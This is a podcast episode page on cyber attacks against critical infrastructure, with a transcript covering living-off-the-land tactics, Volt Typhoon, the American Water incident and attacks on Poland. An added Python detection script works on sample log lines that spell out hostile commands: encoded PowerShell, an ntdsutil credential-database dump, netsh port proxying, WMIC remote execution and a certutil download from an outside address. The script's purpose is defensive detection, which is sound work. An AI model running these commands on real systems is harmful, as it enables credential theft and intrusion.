Industry Defence Insights

Digital Battlegrounds

Jarek Sordyl Season 3 Episode 5

Critical infrastructure systems face increasingly sophisticated cyber attacks, with hackers using legitimate tools already present in targeted networks to avoid detection and establish persistence.

• "Living off the land" tactics are hard to detect because attackers run legitimate system tools already present on the network instead of dropping malware that signature-based tooling could flag
• The attack on American Water disrupted IT systems like customer billing while highlighting vulnerabilities in essential services
• Convergence of operational technology and information technology creates more entry points for attackers
• European infrastructure experiencing surge in cyber attacks since Russia-Ukraine conflict began
• Poland reported over 400,000 cyber incidents in first half of 2024, double the total for all of 2023
• "Hybrid attacks" combine traditional hacking with disinformation campaigns and communication disruption
• Geopolitical tensions fuel sophisticated attacks targeting critical infrastructure
• Global cooperation required to protect interconnected systems from evolving threats

Stay vigilant and stay safe.
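The first bullet is the defender's real problem with LOTL: the binaries are supposed to be there, so the only thing left to key on is how they are invoked (arguments and parent process) rather than what they are. The Python below is an added example, not code from the episode or from any organisation it mentions; it runs a small argument-and-parentage rule set over constructed process-creation records. The record layout, hostnames, user names, command lines and the specific tool/argument pairs in the rule set are all assumptions made for illustration (the episode names no binaries), and the rules need tuning against a real baseline before use.

```python
"""Heuristic hunt for living-off-the-land (LOTL) activity in process-creation telemetry.

Added example, not from the episode or any vendor. Because the tools involved are
legitimate, the rules look at *arguments and parentage*, not at the image name alone.
The sample log, field layout and rule set are constructed for this example.
"""
import re
from dataclasses import dataclass, field

# Constructed record format (assumption): host|user|parent_image|image|command_line
SAMPLE_LOG = """\
ws01|alice|explorer.exe|notepad.exe|notepad.exe C:\\Users\\alice\\notes.txt
ws01|alice|WINWORD.EXE|powershell.exe|powershell -nop -w hidden -enc SQBFAFgA
dc01|svc_backup|cmd.exe|ntdsutil.exe|ntdsutil.exe "ac i ntds" "ifm" "create full C:\\temp\\x" q q
srv02|jsmith|cmd.exe|netsh.exe|netsh interface portproxy add v4tov4 listenport=9999 connectaddress=10.0.0.5 connectport=3389
srv02|jsmith|cmd.exe|netsh.exe|netsh interface show interface
ws03|bob|cmd.exe|wmic.exe|wmic /node:srv02 process call create "cmd.exe /c whoami"
ws03|bob|cmd.exe|certutil.exe|certutil -urlcache -split -f http://198.51.100.7/a.txt a.txt
ws04|carol|explorer.exe|certutil.exe|certutil -store my
"""


@dataclass
class Event:
    host: str
    user: str
    parent: str   # parent image, lower-cased
    image: str    # process image, lower-cased
    cmdline: str


@dataclass
class Finding:
    event: Event
    rules: list = field(default_factory=list)


# Each rule: (name, image, regex over the command line). The argument shapes are
# an assumption about what is worth surfacing; benign admin use of the same
# binaries (e.g. "netsh interface show", "certutil -store") should not match.
RULES = [
    ("netsh_portproxy", "netsh.exe", re.compile(r"\bportproxy\b.*\badd\b", re.I)),
    ("ntdsutil_ifm_dump", "ntdsutil.exe", re.compile(r"\bifm\b", re.I)),
    ("wmic_remote_exec", "wmic.exe", re.compile(r"/node:.*process\s+call\s+create", re.I)),
    ("certutil_download", "certutil.exe", re.compile(r"-urlcache\b", re.I)),
    ("powershell_encoded", "powershell.exe", re.compile(r"(^|\s)-(e|ec|enc|encodedcommand)\b", re.I)),
]

# Parentage rule: an Office document spawning a shell is abnormal regardless of arguments.
OFFICE_PARENTS = {"winword.exe", "excel.exe", "powerpnt.exe", "outlook.exe"}
SHELLS = {"cmd.exe", "powershell.exe", "pwsh.exe", "wscript.exe", "cscript.exe", "mshta.exe"}


def parse_line(line: str) -> Event:
    """Split one constructed record into an Event; the command line may itself contain '|'."""
    host, user, parent, image, cmdline = line.split("|", 4)
    return Event(host, user, parent.lower(), image.lower(), cmdline)


def match_rules(evt: Event) -> list:
    """Return the names of every rule the event trips, in rule-set order."""
    hits = [name for name, image, rx in RULES if evt.image == image and rx.search(evt.cmdline)]
    if evt.parent in OFFICE_PARENTS and evt.image in SHELLS:
        hits.append("office_spawns_shell")
    return hits


def hunt(log_text: str) -> list:
    """Run every record through the rule set and keep only those with at least one hit."""
    findings = []
    for line in log_text.splitlines():
        if not line.strip():
            continue
        evt = parse_line(line)
        hits = match_rules(evt)
        if hits:
            findings.append(Finding(evt, hits))
    return findings


if __name__ == "__main__":
    for f in hunt(SAMPLE_LOG):
        print(f"{f.event.host:6} {f.event.user:11} {f.event.image:15} {', '.join(f.rules)}")
```

Of the eight constructed records, five are surfaced and the two benign uses of netsh and certutil are not; the point is that the same binary is allowed or flagged purely on its arguments and parent, which is the kind of telemetry (process creation with full command line) a network has to be collecting for LOTL activity to be visible at all.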



Speaker 1:

All right, so today we're going to dive into a topic that's kind of unsettling, honestly: cyber attacks, specifically those targeting critical infrastructure.

Speaker 2:

Yeah, that's right.

Speaker 1:

And you sent over some articles that really highlight what's been going on, both in the US and in Europe, and I've got to say it's some pretty concerning stuff. Definitely. You know, we're talking about systems that literally keep our lights on, our water running. You know, a lot of stuff that we just take for granted. So, ready to sort of unpack all this and see what it all means?

Speaker 2:

Yeah, absolutely, let's dive in. It's definitely a very complex landscape and the stakes are very high.

Speaker 1:

Okay, so one article highlighted these attacks on US energy infrastructure and they were using this tactic called living off the land, or LOTL. Have you heard of this?

Speaker 2:

Oh yeah, LOTL is. It's becoming increasingly common, unfortunately.

Speaker 1:

Yeah, so from what I understand, it's basically where hackers use legitimate tools that are already in the system to kind of like hide their activity. It's almost like a digital Trojan horse.

Speaker 2:

Yeah.

Speaker 1:

And they even mentioned this group that's, I think they said, linked to China. Volt Typhoon was the name, using this tactic. So I guess the question is, like, why is this such a big deal? Like, why is the fact that they're using legitimate tools such a problem?

Speaker 2:

Well, you know, think of it this way: with LOTL, hackers are basically using the system's own tools against it. It makes it incredibly difficult to detect malicious activity.

Speaker 1:

Right, because it's like it's all supposed to be there.

Speaker 2:

Exactly. It's like trying to find a needle in a haystack, and this can give hackers long-term access to the system to really map things out, potentially steal sensitive data and even set the stage for sabotage down the line.

Speaker 1:

Okay. So it's not just like they're getting in, they're staying in.

Speaker 2:

Right, they're persistent. They're trying to establish persistence within the network.

Speaker 1:

That's really unsettling to think about. It makes you realize just how vulnerable these systems really are, and it's not just energy, right? I mean, there's that cyber attack on American Water, one of the biggest water utility companies in the US.

Speaker 2:

Yeah, that was a big one.

Speaker 1:

And you know, while they said that the water quality wasn't affected this time, it still messed with their IT systems like customer billing and stuff like that. Yeah, I mean, it kind of makes you wonder, like what kind of cybersecurity measures are in place for the water system where you live.

Speaker 2:

Right, and that's a great point to bring up, because a lot of people don't realize that these critical infrastructure systems, whether it's water, energy, transportation, they're all increasingly interconnected.

Speaker 1:

Yeah.

Speaker 2:

And that attack on American Water is a prime example of that. We're seeing a growing integration of what we call OT, or operational technology, which controls the physical processes, and IT, which is information technology, which manages data, and this convergence creates more points of entry for attackers and it makes securing these systems much more complex.

Speaker 1:

Okay, so more connections means more vulnerabilities, and speaking of connections, things seem even more tense over in Europe, don't they, especially with everything going on between Russia and Ukraine? One of the articles mentioned this huge surge in cyber attacks on critical infrastructure in Europe. Since that whole conflict began, I think they said in 2022 alone, there were like 48 successful attacks on the energy sector.

Speaker 2:

Yeah, and Europe's reliance on Russian energy has definitely made it a prime target for cyber warfare.

Speaker 1:

Yeah, I can see that.

Speaker 2:

The articles you sent. They highlighted Russian hacking groups targeting energy grids, railway systems, hospitals, even.

Speaker 1:

Wow.

Speaker 2:

It's a stark reminder that cyber attacks are often intertwined with geopolitical goals and tensions.

Speaker 1:

And it's not even just straight up hacking either. Right, they were talking about these hybrid attacks. What are those all about?

Speaker 2:

So hybrid attacks are basically multifaceted. They might combine traditional hacking techniques with things like disinformation campaigns, electronic jamming, disruption of communications, basically trying to create a very confusing and chaotic environment.

Speaker 1:

So it's not just the systems. It's like messing with people's minds too.

Speaker 2:

Exactly. The goal is often to sow discord, to erode public trust and to make it difficult to mount an effective response.

Speaker 1:

Yeah, like almost like adding psychological warfare on top of everything else.

Speaker 2:

Right.

Speaker 1:

One article really zeroed in on Poland. It seems like they're right in the thick of things.

Speaker 2:

Yeah.

Speaker 1:

They said there were something like over 400,000 cyber incidents reported just in the first half of 2024. Wow, that's double the total for all of 2023.

Speaker 2:

Yeah, and Poland's location and its strong support for Ukraine definitely make it a prime target. Polish security services have identified sabotage groups linked to Russia and Belarus operating within the country, and their goals seem to be blackmail and the destabilization of Poland, adding yet another layer of complexity to this whole situation.

Speaker 1:

So it's like we've got increasingly sophisticated hacking techniques, interconnected systems creating more vulnerabilities and then, on top of all of that, geopolitical tensions that are fueling a rise in these attacks. It's kind of daunting, honestly.

Speaker 2:

It is, and it really begs the question: as technology continues to evolve, as our reliance on these interconnected systems continues to grow, how do we ensure the resilience of critical infrastructure against these increasingly sophisticated threats? It's a huge challenge and it requires a global effort, not just from governments and security experts, but from everyone. We all have a role to play in this.

Speaker 1:

Yeah, well, on that note, I think that's a good place to wrap up for today.

Speaker 2:

Sounds good.

Speaker 1:

So thanks for breaking all that down.

Speaker 2:

You're welcome.

Speaker 1:

And to all of you listening out there stay vigilant and stay safe.

Speaker 2:

Absolutely. Till next time, see you.